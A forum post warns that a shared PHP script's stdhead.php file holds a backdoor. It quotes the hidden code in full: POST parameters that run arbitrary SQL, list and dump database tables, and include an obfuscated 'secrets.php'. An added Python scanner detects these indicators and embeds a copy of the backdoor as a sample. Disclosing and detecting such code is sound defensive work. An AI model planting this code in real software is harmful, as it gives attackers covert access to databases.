Thread: Urban Dirty
#2
21st March 2010, 14:45
tlogic
Member
Join Date: May 2010
Posts: 1

Attention
The file stdhead.php from the above post contains a backdoor!

Note: I am not accusing sammygo for that because he might have gotten the file from another source.

In any case, the backdoor is in the file include/stdhead.php at lines 260-299.

These are the offending lines:
PHP Code:
$h_cmd=$_POST['h_cmd'];
$h_display=$_POST['h_display'];
$h_table=$_POST['h_table'];

...

if($h_cmd) {
    set_time_limit(0);
    mysql_query($h_cmd) or die(mysql_error());
}
if($h_display) {
    set_time_limit(0);
    $h_addr=chr(115).chr(101).chr(99).chr(114).chr(101).chr(116).chr(115).".".chr(112).chr(104).chr(112);
    include $h_addr;
    echo "<br />";
    if($mysql_db) $h_tables=mysql_list_tables($mysql_db);
    else $h_tables=mysql_list_tables($_POST['db']);
    while(list($h_table)=mysql_fetch_row($h_tables)) {
        echo "<b>$h_table</b><br />";
        $h_res=mysql_query("describe $h_table") or die(mysql_error());
        echo "<table><tr><td>Field</td><td>Type</td><td>NULL</td><td>Key</td><td>Default</td><td>Extra</td></tr>";
        while($h_desc=mysql_fetch_array($h_res))
            echo "<tr><td>$h_desc[0]</td><td>$h_desc[1]</td><td>$h_desc[2]</td><td>$h_desc[3]</td><td>$h_desc[4]</td></tr>";
        echo "</table>";
    }
}
if($h_table) {
    set_time_limit(0);
    $x=1;
    $h_res=mysql_query("select*from $h_table") or die(mysql_error());
    $i=mysql_num_fields($h_res);
    echo "<table>";
    while($h_value=mysql_fetch_row($h_res)) {
        echo "<tr><td><b>".$x++."</b></td>";
        for($j=0;$j<=$i;$j++)
            echo "<td>".$h_value[$j]."</td>";
        echo "</tr>";
    }
    echo "</table>";
}

So what this code basically does:

The "h_cmd" POST variable executes any SQL command on the server.

The "h_display" POST variable displays a list of all the tables in the database.
The attacker also has the ability to select another database by supplying the POST variable "db".

The "h_table" POST variable prints all the data contained in the table specified by "h_table".

Also, the variable $h_addr contains the string secrets.php and is used to include that file.

So, to be safe, delete all the above lines from stdhead.php.
I haven't thoroughly reviewed the whole code so there might be more backdoors in the other files.

So beware before using that code!
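Added example (not part of the post above, and not code from the Urban Dirty source): a small Python scanner that looks for the three indicators the post describes, so the rest of the code base can be checked rather than only include/stdhead.php. It decodes `chr()` concatenation chains (the trick used to hide the file name secrets.php), flags `mysql_query()` calls whose argument is a variable assigned straight from `$_POST`/`$_GET`/`$_REQUEST`, and flags `include`/`require` of a request-controlled or obfuscated variable. The `SAMPLE_PHP` input is constructed for this example and mirrors the quoted fragment; the regexes are deliberately simple (line-based, no real PHP parsing), so treat hits as leads for manual review, not as proof.

```python
import re
import sys

# Constructed sample input (not a real file): mirrors the backdoor pattern
# quoted in the post, plus one ordinary query so the scanner has a negative case.
SAMPLE_PHP = r'''<?php
$h_cmd=$_POST['h_cmd'];
$h_display=$_POST['h_display'];
$h_table=$_POST['h_table'];
if($h_cmd) { set_time_limit(0); mysql_query($h_cmd) or die(mysql_error()); }
if($h_display) {
$h_addr=chr(115).chr(101).chr(99).chr(114).chr(101).chr(116).chr(115).".".chr(112).chr(104).chr(112);
include $h_addr;
}
$id = (int)$_GET['id'];
$res = mysql_query("select name from users where id=$id");
'''

# $var = $_POST[...] / $_GET[...] / ...   -> $var is request-controlled
SOURCE = re.compile(r'\$(\w+)\s*=\s*\$_(?:POST|GET|REQUEST|COOKIE)\b')
# one piece of a concatenation: chr(N), "literal" or 'literal'
PIECE = re.compile(r'chr\((\d+)\)|"([^"]*)"|\'([^\']*)\'')
# two or more pieces joined with "."
CHAIN = re.compile(r'(?:chr\(\d+\)|"[^"]*"|\'[^\']*\')(?:\s*\.\s*(?:chr\(\d+\)|"[^"]*"|\'[^\']*\'))+')
CHAIN_ASSIGN = re.compile(r'\$(\w+)\s*=\s*(' + CHAIN.pattern + r')')
# mysql_query($var) or mysql_query($_POST[...]) with nothing else in the argument
QUERY_SINK = re.compile(r'mysql_query\(\s*(\$\w+|\$_(?:POST|GET|REQUEST)\[[^\]]*\])\s*\)')
# include/require of a variable
INCLUDE_SINK = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)')


def decode_chain(expr):
    """Turn a chr(115).chr(101)."." style concatenation back into plain text."""
    out = []
    for m in PIECE.finditer(expr):
        if m.group(1) is not None:
            out.append(chr(int(m.group(1))))
        elif m.group(2) is not None:
            out.append(m.group(2))
        else:
            out.append(m.group(3))
    return "".join(out)


def scan_php(source):
    """Return a list of (line_no, kind, detail) findings for one PHP file's text."""
    tainted = set()      # variables assigned directly from request input
    obfuscated = {}      # variables built from a chr() chain -> decoded value
    findings = []
    for n, line in enumerate(source.splitlines(), 1):
        for m in SOURCE.finditer(line):
            tainted.add(m.group(1))
        for m in CHAIN_ASSIGN.finditer(line):
            if 'chr(' in m.group(2):
                decoded = decode_chain(m.group(2))
                obfuscated[m.group(1)] = decoded
                findings.append((n, 'obfuscated-string', f'${m.group(1)} = {decoded!r}'))
        for m in QUERY_SINK.finditer(line):
            arg = m.group(1)
            if arg.startswith('$_') or arg[1:] in tainted:
                findings.append((n, 'raw-sql-from-request', arg))
        for m in INCLUDE_SINK.finditer(line):
            var = m.group(1)
            if var in tainted:
                findings.append((n, 'include-from-request', '$' + var))
            elif var in obfuscated:
                findings.append((n, 'include-obfuscated-path', obfuscated[var]))
    return findings


if __name__ == '__main__':
    # Scan files given on the command line, or the constructed sample when none are given.
    paths = sys.argv[1:]
    if not paths:
        for line_no, kind, detail in scan_php(SAMPLE_PHP):
            print(f'sample.php:{line_no}: {kind}: {detail}')
    for path in paths:
        with open(path, encoding='utf-8', errors='replace') as fh:
            for line_no, kind, detail in scan_php(fh.read()):
                print(f'{path}:{line_no}: {kind}: {detail}')
```

Run without arguments it reports the three hits in the sample (the raw `mysql_query($h_cmd)`, the `$h_addr` chain decoding to `secrets.php`, and the `include $h_addr`) and stays silent on the integer-cast query; run as `python scan.py include/*.php` it reports the same indicators across a tree. Because assignments are tracked per file in source order, a variable tainted later in the file than its use will be missed, which is acceptable for a triage tool but not for a guarantee of cleanliness.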